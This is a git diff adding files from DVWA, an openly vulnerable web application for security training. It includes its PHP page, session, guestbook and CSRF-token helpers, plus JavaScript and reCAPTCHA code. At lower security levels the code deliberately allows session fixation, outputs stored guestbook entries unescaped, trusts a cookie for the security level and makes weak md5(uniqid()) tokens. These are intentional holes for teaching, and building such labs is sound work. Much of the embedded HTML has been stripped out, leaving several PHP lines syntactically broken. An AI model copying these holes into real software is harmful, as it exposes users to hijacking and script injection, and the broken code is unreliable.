$Element['handler']['argument']; + $destination = $Element['handler']['destination']; + } + + $Element[$destination] = $this->{$function}($argument, $Element['nonNestables']); + + if ($destination === 'handler') + { + $Element = $this->handle($Element); + } + + unset($Element['handler']); + } + + return $Element; + } + + protected function handleElementRecursive(array $Element) + { + return $this->elementApplyRecursive(array($this, 'handle'), $Element); + } + + protected function handleElementsRecursive(array $Elements) + { + return $this->elementsApplyRecursive(array($this, 'handle'), $Elements); + } + + protected function elementApplyRecursive($closure, array $Element) + { + $Element = call_user_func($closure, $Element); + + if (isset($Element['elements'])) + { + $Element['elements'] = $this->elementsApplyRecursive($closure, $Element['elements']); + } + elseif (isset($Element['element'])) + { + $Element['element'] = $this->elementApplyRecursive($closure, $Element['element']); + } + + return $Element; + } + + protected function elementApplyRecursiveDepthFirst($closure, array $Element) + { + if (isset($Element['elements'])) + { + $Element['elements'] = $this->elementsApplyRecursiveDepthFirst($closure, $Element['elements']); + } + elseif (isset($Element['element'])) + { + $Element['element'] = $this->elementsApplyRecursiveDepthFirst($closure, $Element['element']); + } + + $Element = call_user_func($closure, $Element); + + return $Element; + } + + protected function elementsApplyRecursive($closure, array $Elements) + { + foreach ($Elements as &$Element) + { + $Element = $this->elementApplyRecursive($closure, $Element); + } + + return $Elements; + } + + protected function elementsApplyRecursiveDepthFirst($closure, array $Elements) + { + foreach ($Elements as &$Element) + { + $Element = $this->elementApplyRecursiveDepthFirst($closure, $Element); + } + + return $Elements; + } + + protected function element(array $Element) + { + if ($this->safeMode) + { + $Element = $this->sanitiseElement($Element); + } + + # identity map if element has no handler + $Element = $this->handle($Element); + + $hasName = isset($Element['name']); + + $markup = ''; + + if ($hasName) + { + $markup .= '<' . $Element['name']; + + if (isset($Element['attributes'])) + { + foreach ($Element['attributes'] as $name => $value) + { + if ($value === null) + { + continue; + } + + $markup .= " $name=\"".self::escape($value).'"'; + } + } + } + + $permitRawHtml = false; + + if (isset($Element['text'])) + { + $text = $Element['text']; + } + // very strongly consider an alternative if you're writing an + // extension + elseif (isset($Element['rawHtml'])) + { + $text = $Element['rawHtml']; + + $allowRawHtmlInSafeMode = isset($Element['allowRawHtmlInSafeMode']) && $Element['allowRawHtmlInSafeMode']; + $permitRawHtml = !$this->safeMode || $allowRawHtmlInSafeMode; + } + + $hasContent = isset($text) || isset($Element['element']) || isset($Element['elements']); + + if ($hasContent) + { + $markup .= $hasName ? '>' : ''; + + if (isset($Element['elements'])) + { + $markup .= $this->elements($Element['elements']); + } + elseif (isset($Element['element'])) + { + $markup .= $this->element($Element['element']); + } + else + { + if (!$permitRawHtml) + { + $markup .= self::escape($text, true); + } + else + { + $markup .= $text; + } + } + + $markup .= $hasName ? '' : ''; + } + elseif ($hasName) + { + $markup .= ' />'; + } + + return $markup; + } + + protected function elements(array $Elements) + { + $markup = ''; + + $autoBreak = true; + + foreach ($Elements as $Element) + { + if (empty($Element)) + { + continue; + } + + $autoBreakNext = (isset($Element['autobreak']) + ? $Element['autobreak'] : isset($Element['name']) + ); + // (autobreak === false) covers both sides of an element + $autoBreak = !$autoBreak ? $autoBreak : $autoBreakNext; + + $markup .= ($autoBreak ? "\n" : '') . $this->element($Element); + $autoBreak = $autoBreakNext; + } + + $markup .= $autoBreak ? "\n" : ''; + + return $markup; + } + + # ~ + + protected function li($lines) + { + $Elements = $this->linesElements($lines); + + if ( ! in_array('', $lines) + and isset($Elements[0]) and isset($Elements[0]['name']) + and $Elements[0]['name'] === 'p' + ) { + unset($Elements[0]['name']); + } + + return $Elements; + } + + # + # AST Convenience + # + + /** + * Replace occurrences $regexp with $Elements in $text. Return an array of + * elements representing the replacement. + */ + protected static function pregReplaceElements($regexp, $Elements, $text) + { + $newElements = array(); + + while (preg_match($regexp, $text, $matches, PREG_OFFSET_CAPTURE)) + { + $offset = $matches[0][1]; + $before = substr($text, 0, $offset); + $after = substr($text, $offset + strlen($matches[0][0])); + + $newElements[] = array('text' => $before); + + foreach ($Elements as $Element) + { + $newElements[] = $Element; + } + + $text = $after; + } + + $newElements[] = array('text' => $text); + + return $newElements; + } + + # + # Deprecated Methods + # + + function parse($text) + { + $markup = $this->text($text); + + return $markup; + } + + protected function sanitiseElement(array $Element) + { + static $goodAttribute = '/^[a-zA-Z0-9][a-zA-Z0-9-_]*+$/'; + static $safeUrlNameToAtt = array( + 'a' => 'href', + 'img' => 'src', + ); + + if ( ! isset($Element['name'])) + { + unset($Element['attributes']); + return $Element; + } + + if (isset($safeUrlNameToAtt[$Element['name']])) + { + $Element = $this->filterUnsafeUrlInAttribute($Element, $safeUrlNameToAtt[$Element['name']]); + } + + if ( ! empty($Element['attributes'])) + { + foreach ($Element['attributes'] as $att => $val) + { + # filter out badly parsed attribute + if ( ! preg_match($goodAttribute, $att)) + { + unset($Element['attributes'][$att]); + } + # dump onevent attribute + elseif (self::striAtStart($att, 'on')) + { + unset($Element['attributes'][$att]); + } + } + } + + return $Element; + } + + protected function filterUnsafeUrlInAttribute(array $Element, $attribute) + { + foreach ($this->safeLinksWhitelist as $scheme) + { + if (self::striAtStart($Element['attributes'][$attribute], $scheme)) + { + return $Element; + } + } + + $Element['attributes'][$attribute] = str_replace(':', '%3A', $Element['attributes'][$attribute]); + + return $Element; + } + + # + # Static Methods + # + + protected static function escape($text, $allowQuotes = false) + { + return htmlspecialchars($text, $allowQuotes ? ENT_NOQUOTES : ENT_QUOTES, 'UTF-8'); + } + + protected static function striAtStart($string, $needle) + { + $len = strlen($needle); + + if ($len > strlen($string)) + { + return false; + } + else + { + return strtolower(substr($string, 0, $len)) === strtolower($needle); + } + } + + static function instance($name = 'default') + { + if (isset(self::$instances[$name])) + { + return self::$instances[$name]; + } + + $instance = new static(); + + self::$instances[$name] = $instance; + + return $instance; + } + + private static $instances = array(); + + # + # Fields + # + + protected $DefinitionData; + + # + # Read-Only + + protected $specialCharacters = array( + '\\', '`', '*', '_', '{', '}', '[', ']', '(', ')', '>', '#', '+', '-', '.', '!', '|', '~' + ); + + protected $StrongRegex = array( + '*' => '/^[*]{2}((?:\\\\\*|[^*]|[*][^*]*+[*])+?)[*]{2}(?![*])/s', + '_' => '/^__((?:\\\\_|[^_]|_[^_]*+_)+?)__(?!_)/us', + ); + + protected $EmRegex = array( + '*' => '/^[*]((?:\\\\\*|[^*]|[*][*][^*]+?[*][*])+?)[*](?![*])/s', + '_' => '/^_((?:\\\\_|[^_]|__[^_]*__)+?)_(?!_)\b/us', + ); + + protected $regexHtmlAttribute = '[a-zA-Z_:][\w:.-]*+(?:\s*+=\s*+(?:[^"\'=<>`\s]+|"[^"]*+"|\'[^\']*+\'))?+'; + + protected $voidElements = array( + 'area', 'base', 'br', 'col', 'command', 'embed', 'hr', 'img', 'input', 'link', 'meta', 'param', 'source', + ); + + protected $textLevelElements = array( + 'a', 'br', 'bdo', 'abbr', 'blink', 'nextid', 'acronym', 'basefont', + 'b', 'em', 'big', 'cite', 'small', 'spacer', 'listing', + 'i', 'rp', 'del', 'code', 'strike', 'marquee', + 'q', 'rt', 'ins', 'font', 'strong', + 's', 'tt', 'kbd', 'mark', + 'u', 'xm', 'sub', 'nobr', + 'sup', 'ruby', + 'var', 'span', + 'wbr', 'time', + ); +} diff --git a/DVWA/dvwa/includes/dvwaPage.inc.php b/DVWA/dvwa/includes/dvwaPage.inc.php new file mode 100644 index 00000000..e33b7afb --- /dev/null +++ b/DVWA/dvwa/includes/dvwaPage.inc.php @@ -0,0 +1,691 @@ + $maxlifetime, + 'path' => '/', + 'domain' => $domain, + 'secure' => $secure, + 'httponly' => $httponly, + 'samesite' => $samesite + ]); + + /* + * We need to force a new Set-Cookie header with the updated flags by updating + * the session id, either regenerating it or setting it to a value, because + * session_start() might not generate a Set-Cookie header if a cookie already + * exists. + * + * For impossible security level, we regenerate the session id, PHP will + * generate a new random id. This is good security practice because it + * prevents the reuse of a previous unauthenticated id that an attacker + * might have knowledge of (aka session fixation attack). + * + * For lower levels, we want to allow session fixation attacks, so if an id + * already exists, we don't want it to change after authentication. We thus + * set the id to its previous value using session_id(), which will force + * the Set-Cookie header. + */ + if ($security_level == 'impossible') { + session_start(); + session_regenerate_id(); // force a new id to be generated + } + else { + if (isset($_COOKIE[session_name()])) // if a session id already exists + session_id($_COOKIE[session_name()]); // we keep the same id + session_start(); // otherwise a new one will be generated here + } +} + +if (array_key_exists ("Login", $_POST) && $_POST['Login'] == "Login") { + dvwa_start_session(); +} else { + if (!session_id()) { + session_start(); + } +} + +if (!array_key_exists ("default_locale", $_DVWA)) { + $_DVWA[ 'default_locale' ] = "en"; +} + +dvwaLocaleSet( $_DVWA[ 'default_locale' ] ); + +// Start session functions -- + +function &dvwaSessionGrab() { + if( !isset( $_SESSION[ 'dvwa' ] ) ) { + $_SESSION[ 'dvwa' ] = array(); + } + return $_SESSION[ 'dvwa' ]; +} + + +function dvwaPageStartup( $pActions ) { + if (in_array('authenticated', $pActions)) { + if( !dvwaIsLoggedIn()) { + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'login.php' ); + } + } +} + +function dvwaLogin( $pUsername ) { + $dvwaSession =& dvwaSessionGrab(); + $dvwaSession[ 'username' ] = $pUsername; +} + + +function dvwaIsLoggedIn() { + global $_DVWA; + + if (array_key_exists("disable_authentication", $_DVWA) && $_DVWA['disable_authentication']) { + return true; + } + $dvwaSession =& dvwaSessionGrab(); + return isset( $dvwaSession[ 'username' ] ); +} + + +function dvwaLogout() { + $dvwaSession =& dvwaSessionGrab(); + unset( $dvwaSession[ 'username' ] ); +} + + +function dvwaPageReload() { + if ( array_key_exists( 'HTTP_X_FORWARDED_PREFIX' , $_SERVER )) { + dvwaRedirect( $_SERVER[ 'HTTP_X_FORWARDED_PREFIX' ] . $_SERVER[ 'PHP_SELF' ] ); + } + else { + dvwaRedirect( $_SERVER[ 'PHP_SELF' ] ); + } +} + +function dvwaCurrentUser() { + $dvwaSession =& dvwaSessionGrab(); + return ( isset( $dvwaSession[ 'username' ]) ? $dvwaSession[ 'username' ] : 'Unknown') ; +} + +// -- END (Session functions) + +function &dvwaPageNewGrab() { + $returnArray = array( + 'title' => 'Damn Vulnerable Web Application (DVWA)', + 'title_separator' => ' :: ', + 'body' => '', + 'page_id' => '', + 'help_button' => '', + 'source_button' => '', + ); + return $returnArray; +} + + +function dvwaThemeGet() { + if (isset($_COOKIE['theme'])) { + return $_COOKIE[ 'theme' ]; + } + return 'light'; +} + + +function dvwaSecurityLevelGet() { + global $_DVWA; + + // If there is a security cookie, that takes priority. + if (isset($_COOKIE['security'])) { + return $_COOKIE[ 'security' ]; + } + + // If not, check to see if authentication is disabled, if it is, use + // the default security level. + if (array_key_exists("disable_authentication", $_DVWA) && $_DVWA['disable_authentication']) { + return $_DVWA[ 'default_security_level' ]; + } + + // Worse case, set the level to impossible. + return 'impossible'; +} + + +function dvwaSecurityLevelSet( $pSecurityLevel ) { + if( $pSecurityLevel == 'impossible' ) { + $httponly = true; + } + else { + $httponly = false; + } + + setcookie( 'security', $pSecurityLevel, 0, "/", "", false, $httponly ); + $_COOKIE['security'] = $pSecurityLevel; +} + +function dvwaLocaleGet() { + $dvwaSession =& dvwaSessionGrab(); + return $dvwaSession[ 'locale' ]; +} + +function dvwaSQLiDBGet() { + global $_DVWA; + return $_DVWA['SQLI_DB']; +} + +function dvwaLocaleSet( $pLocale ) { + $dvwaSession =& dvwaSessionGrab(); + $locales = array('en', 'zh'); + if( in_array( $pLocale, $locales) ) { + $dvwaSession[ 'locale' ] = $pLocale; + } else { + $dvwaSession[ 'locale' ] = 'en'; + } +} + +// Start message functions -- + +function dvwaMessagePush( $pMessage ) { + $dvwaSession =& dvwaSessionGrab(); + if( !isset( $dvwaSession[ 'messages' ] ) ) { + $dvwaSession[ 'messages' ] = array(); + } + $dvwaSession[ 'messages' ][] = $pMessage; +} + + +function dvwaMessagePop() { + $dvwaSession =& dvwaSessionGrab(); + if( !isset( $dvwaSession[ 'messages' ] ) || count( $dvwaSession[ 'messages' ] ) == 0 ) { + return false; + } + return array_shift( $dvwaSession[ 'messages' ] ); +} + + +function messagesPopAllToHtml() { + $messagesHtml = ''; + while( $message = dvwaMessagePop() ) { // TODO- sharpen! + $messagesHtml .= "

{$message}
"; + } + + return $messagesHtml; +} + +// --END (message functions) + +function dvwaHtmlEcho( $pPage ) { + $menuBlocks = array(); + + $menuBlocks[ 'home' ] = array(); + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'home' ][] = array( 'id' => 'home', 'name' => 'Home', 'url' => '.' ); + $menuBlocks[ 'home' ][] = array( 'id' => 'instructions', 'name' => 'Instructions', 'url' => 'instructions.php' ); + $menuBlocks[ 'home' ][] = array( 'id' => 'setup', 'name' => 'Setup / Reset DB', 'url' => 'setup.php' ); + } + else { + $menuBlocks[ 'home' ][] = array( 'id' => 'setup', 'name' => 'Setup DVWA', 'url' => 'setup.php' ); + $menuBlocks[ 'home' ][] = array( 'id' => 'instructions', 'name' => 'Instructions', 'url' => 'instructions.php' ); + } + + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'vulnerabilities' ] = array(); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'exec', 'name' => 'Command Injection', 'url' => 'vulnerabilities/exec/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/.?page=include.php' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'upload', 'name' => 'File Upload', 'url' => 'vulnerabilities/upload/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'captcha', 'name' => 'Insecure CAPTCHA', 'url' => 'vulnerabilities/captcha/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'weak_id', 'name' => 'Weak Session IDs', 'url' => 'vulnerabilities/weak_id/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_d', 'name' => 'XSS (DOM)', 'url' => 'vulnerabilities/xss_d/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_r', 'name' => 'XSS (Reflected)', 'url' => 'vulnerabilities/xss_r/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_s', 'name' => 'XSS (Stored)', 'url' => 'vulnerabilities/xss_s/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csp', 'name' => 'CSP Bypass', 'url' => 'vulnerabilities/csp/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'javascript', 'name' => 'JavaScript', 'url' => 'vulnerabilities/javascript/' ); + if (dvwaCurrentUser() == "admin") { + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'authbypass', 'name' => 'Authorisation Bypass', 'url' => 'vulnerabilities/authbypass/' ); + } + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'open_redirect', 'name' => 'Open HTTP Redirect', 'url' => 'vulnerabilities/open_redirect/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'encryption', 'name' => 'Cryptography', 'url' => 'vulnerabilities/cryptography/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'api', 'name' => 'API', 'url' => 'vulnerabilities/api/' ); + } + + $menuBlocks[ 'meta' ] = array(); + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'meta' ][] = array( 'id' => 'security', 'name' => 'DVWA Security', 'url' => 'security.php' ); + $menuBlocks[ 'meta' ][] = array( 'id' => 'phpinfo', 'name' => 'PHP Info', 'url' => 'phpinfo.php' ); + } + $menuBlocks[ 'meta' ][] = array( 'id' => 'about', 'name' => 'About', 'url' => 'about.php' ); + + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'logout' ] = array(); + $menuBlocks[ 'logout' ][] = array( 'id' => 'logout', 'name' => 'Logout', 'url' => 'logout.php' ); + } + + $menuHtml = ''; + + foreach( $menuBlocks as $menuBlock ) { + $menuBlockHtml = ''; + foreach( $menuBlock as $menuItem ) { + $selectedClass = ( $menuItem[ 'id' ] == $pPage[ 'page_id' ] ) ? 'selected' : ''; + $fixedUrl = DVWA_WEB_PAGE_TO_ROOT.$menuItem[ 'url' ]; + $menuBlockHtml .= "
  • {$menuItem[ 'name' ]}
    • \n"; + } + $menuHtml .= "
      {$menuBlockHtml}
    "; + } + + // Get security cookie -- + $securityLevelHtml = ''; + switch( dvwaSecurityLevelGet() ) { + case 'low': + $securityLevelHtml = 'low'; + break; + case 'medium': + $securityLevelHtml = 'medium'; + break; + case 'high': + $securityLevelHtml = 'high'; + break; + default: + $securityLevelHtml = 'impossible'; + break; + } + // -- END (security cookie) + + $userInfoHtml = 'Username: ' . ( dvwaCurrentUser() ); + $securityLevelHtml = "Security Level: {$securityLevelHtml}"; + $localeHtml = 'Locale: ' . ( dvwaLocaleGet() ); + $sqliDbHtml = 'SQLi DB: ' . ( dvwaSQLiDBGet() ); + + + $messagesHtml = messagesPopAllToHtml(); + if( $messagesHtml ) { + $messagesHtml = "
    {$messagesHtml}
    "; + } + + $systemInfoHtml = ""; + if( dvwaIsLoggedIn() ) + $systemInfoHtml = "
    {$userInfoHtml}
    {$securityLevelHtml}
    {$localeHtml}
    {$sqliDbHtml}
    "; + if( $pPage[ 'source_button' ] ) { + $systemInfoHtml = dvwaButtonSourceHtmlGet( $pPage[ 'source_button' ] ) . " $systemInfoHtml"; + } + if( $pPage[ 'help_button' ] ) { + $systemInfoHtml = dvwaButtonHelpHtmlGet( $pPage[ 'help_button' ] ) . " $systemInfoHtml"; + } + + // Send Headers + main HTML code + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + + echo " + + + + + + + {$pPage[ 'title' ]} + + + + + + + + + + +
    + +
    + + \"Damn + + \"Damn + +
    + +
    + +
    + {$menuHtml} +
    + +
    + +
    + + {$pPage[ 'body' ]} +

    + {$messagesHtml} + +
    + +
    +
    + +
    + {$systemInfoHtml} +
    + +
    + +

    Damn Vulnerable Web Application (DVWA)

    + + +
    + +
    + + + +"; +} + + +function dvwaHelpHtmlEcho( $pPage ) { + // Send Headers + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + + echo " + + + + + + + + {$pPage[ 'title' ]} + + + + + + + + + +
    + + {$pPage[ 'body' ]} + +
    + + + +"; +} + + +function dvwaSourceHtmlEcho( $pPage ) { + // Send Headers + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + + echo " + + + + + + + + {$pPage[ 'title' ]} + + + + + + + + + +
    + + {$pPage[ 'body' ]} + +
    + + + +"; +} + +// To be used on all external links -- +function dvwaExternalLinkUrlGet( $pLink,$text=null ) { + if(is_null( $text ) || $text == "") { + return '' . $pLink . ''; + } + else { + return '' . $text . ''; + } +} +// -- END ( external links) + +function dvwaButtonHelpHtmlGet( $pId ) { + $security = dvwaSecurityLevelGet(); + $locale = dvwaLocaleGet(); + return ""; +} + + +function dvwaButtonSourceHtmlGet( $pId ) { + $security = dvwaSecurityLevelGet(); + return ""; +} + + +// Database Management -- + +if( $DBMS == 'MySQL' ) { + $DBMS = htmlspecialchars(strip_tags( $DBMS )); +} +elseif( $DBMS == 'PGSQL' ) { + $DBMS = htmlspecialchars(strip_tags( $DBMS )); +} +else { + $DBMS = "No DBMS selected."; +} + +function dvwaDatabaseConnect() { + global $_DVWA; + global $DBMS; + //global $DBMS_connError; + global $db; + global $sqlite_db_connection; + + if( $DBMS == 'MySQL' ) { + if( !@($GLOBALS["___mysqli_ston"] = mysqli_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ], "", $_DVWA[ 'db_port' ] )) + || !@((bool)mysqli_query($GLOBALS["___mysqli_ston"], "USE " . $_DVWA[ 'db_database' ])) ) { + //die( $DBMS_connError ); + dvwaLogout(); + dvwaMessagePush( 'Unable to connect to the database.
    ' . mysqli_error($GLOBALS["___mysqli_ston"])); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' ); + } + // MySQL PDO Prepared Statements (for impossible levels) + $db = new PDO('mysql:host=' . $_DVWA[ 'db_server' ].';dbname=' . $_DVWA[ 'db_database' ].';port=' . $_DVWA['db_port'] . ';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]); + $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); + $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); + } + elseif( $DBMS == 'PGSQL' ) { + //$dbconn = pg_connect("host={$_DVWA[ 'db_server' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ])}" + //or die( $DBMS_connError ); + dvwaMessagePush( 'PostgreSQL is not currently supported.' ); + dvwaPageReload(); + } + else { + die ( "Unknown {$DBMS} selected." ); + } + + if ($_DVWA['SQLI_DB'] == SQLITE) { + $location = DVWA_WEB_PAGE_TO_ROOT . "database/" . $_DVWA['SQLITE_DB']; + $sqlite_db_connection = new SQLite3($location); + $sqlite_db_connection->enableExceptions(true); + # print "sqlite db setup"; + } +} + +// -- END (Database Management) + + +function dvwaRedirect( $pLocation ) { + session_commit(); + header( "Location: {$pLocation}" ); + exit; +} + +// XSS Stored guestbook function -- +function dvwaGuestbook() { + $query = "SELECT name, comment FROM guestbook"; + $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); + + $guestbook = ''; + + while( $row = mysqli_fetch_row( $result ) ) { + if( dvwaSecurityLevelGet() == 'impossible' ) { + $name = htmlspecialchars( $row[0] ); + $comment = htmlspecialchars( $row[1] ); + } + else { + $name = $row[0]; + $comment = $row[1]; + } + + $guestbook .= "
    Name: {$name}
    " . "Message: {$comment}
    \n"; + } + return $guestbook; +} +// -- END (XSS Stored guestbook) + + +// Token functions -- +function checkToken( $user_token, $session_token, $returnURL ) { # Validate the given (CSRF) token + global $_DVWA; + + if (array_key_exists("disable_authentication", $_DVWA) && $_DVWA['disable_authentication']) { + return true; + } + + if( $user_token !== $session_token || !isset( $session_token ) ) { + dvwaMessagePush( 'CSRF token is incorrect' ); + dvwaRedirect( $returnURL ); + } +} + +function generateSessionToken() { # Generate a brand new (CSRF) token + if( isset( $_SESSION[ 'session_token' ] ) ) { + destroySessionToken(); + } + $_SESSION[ 'session_token' ] = md5( uniqid() ); +} + +function destroySessionToken() { # Destroy any session with the name 'session_token' + unset( $_SESSION[ 'session_token' ] ); +} + +function tokenField() { # Return a field for the (CSRF) token + return ""; +} +// -- END (Token functions) + + +// Setup Functions -- +$PHPUploadPath = realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . "hackable" . DIRECTORY_SEPARATOR . "uploads" ) . DIRECTORY_SEPARATOR; +$PHPCONFIGPath = realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . "config"); + + +$phpDisplayErrors = 'PHP function display_errors: Enabled' : 'failure">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure) +$phpDisplayStartupErrors = 'PHP function display_startup_errors: Enabled' : 'failure">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure) +$phpDisplayErrors = 'PHP function display_errors: Enabled' : 'failure">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure) +$phpURLInclude = 'PHP function allow_url_include: Enabled' : 'failure">Disabled' ) . ''; // RFI +$phpURLFopen = 'PHP function allow_url_fopen: Enabled' : 'failure">Disabled' ) . ''; // RFI +$phpGD = 'PHP module gd: Installed' : 'failure">Missing - Only an issue if you want to play with captchas' ) . ''; // File Upload +$phpMySQL = 'PHP module mysql: Installed' : 'failure">Missing' ) . ''; // Core DVWA +$phpPDO = 'PHP module pdo_mysql: Installed' : 'failure">Missing' ) . ''; // SQLi +$DVWARecaptcha = 'reCAPTCHA key: ' . $_DVWA[ 'recaptcha_public_key' ] : 'failure">Missing' ) . ''; + +$DVWAUploadsWrite = 'Writable folder ' . $PHPUploadPath . ': Yes' : 'failure">No' ) . ''; // File Upload +$bakWritable = 'Writable folder ' . $PHPCONFIGPath . ': Yes' : 'failure">No' ) . ''; // config.php.bak check // File Upload + +$DVWAOS = 'Operating system: ' . ( strtoupper( substr (PHP_OS, 0, 3)) === 'WIN' ? 'Windows' : '*nix' ) . ''; +$SERVER_NAME = 'Web Server SERVER_NAME: ' . $_SERVER[ 'SERVER_NAME' ] . ''; // CSRF + +$MYSQL_USER = 'Database username: ' . $_DVWA[ 'db_user' ] . ''; +$MYSQL_PASS = 'Database password: ' . ( ($_DVWA[ 'db_password' ] != "" ) ? '******' : '*blank*' ) . ''; +$MYSQL_DB = 'Database database: ' . $_DVWA[ 'db_database' ] . ''; +$MYSQL_SERVER = 'Database host: ' . $_DVWA[ 'db_server' ] . ''; +$MYSQL_PORT = 'Database port: ' . $_DVWA[ 'db_port' ] . ''; +// -- END (Setup Functions) + +?> diff --git a/DVWA/dvwa/js/add_event_listeners.js b/DVWA/dvwa/js/add_event_listeners.js new file mode 100644 index 00000000..5d9a82fd --- /dev/null +++ b/DVWA/dvwa/js/add_event_listeners.js @@ -0,0 +1,24 @@ +// These functions need to be called after the content they reference +// has been added to the page otherwise they will fail. + +function addEventListeners() { + var source_button = document.getElementById ("source_button"); + + if (source_button) { + source_button.addEventListener("click", function() { + var url=source_button.dataset.sourceUrl; + popUp (url); + }); + } + + var help_button = document.getElementById ("help_button"); + + if (help_button) { + help_button.addEventListener("click", function() { + var url=help_button.dataset.helpUrl; + popUp (url); + }); + } +} + +addEventListeners(); diff --git a/DVWA/dvwa/js/dvwaPage.js b/DVWA/dvwa/js/dvwaPage.js new file mode 100644 index 00000000..92fc8639 --- /dev/null +++ b/DVWA/dvwa/js/dvwaPage.js @@ -0,0 +1,45 @@ +/* Help popup */ + +function popUp(URL) { + day = new Date(); + id = day.getTime(); + window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,height=300,left=540,top=250'); + //eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,height=300,left=540,top=250');"); +} + +/* Form validation */ + +function validate_required(field,alerttxt) +{ +with (field) { + if (value==null||value=="") { + alert(alerttxt);return false; + } + else { + return true; + } + } +} + +function validateGuestbookForm(thisform) { +with (thisform) { + + // Guestbook form + if (validate_required(txtName,"Name can not be empty.")==false) + {txtName.focus();return false;} + + if (validate_required(mtxMessage,"Message can not be empty.")==false) + {mtxMessage.focus();return false;} + + } +} + +function confirmClearGuestbook() { + return confirm("Are you sure you want to clear the guestbook?"); +} + +function toggleTheme() { + document.body.classList.toggle('dark'); + const theme = document.body.classList.contains('dark') ? 'dark' : 'light'; + document.cookie = "theme=" + theme + "; path=/"; +} diff --git a/DVWA/external/recaptcha/recaptchalib.php b/DVWA/external/recaptcha/recaptchalib.php new file mode 100644 index 00000000..eef48184 --- /dev/null +++ b/DVWA/external/recaptcha/recaptchalib.php @@ -0,0 +1,45 @@ + $key, + 'response' => urlencode($response), + 'remoteip' => urlencode($_SERVER['REMOTE_ADDR']) + ); + + $opt = array( + 'http' => array( + 'header' => "Content-type: application/x-www-form-urlencoded\r\n", + 'method' => 'POST', + 'content' => http_build_query($dat) + ) + ); + + $context = stream_context_create($opt); + $result = file_get_contents($url, false, $context); + + return json_decode($result)->success; + + } catch (Exception $e) { + return null; + } + +} + +function recaptcha_get_html($pubKey){ + return " + +
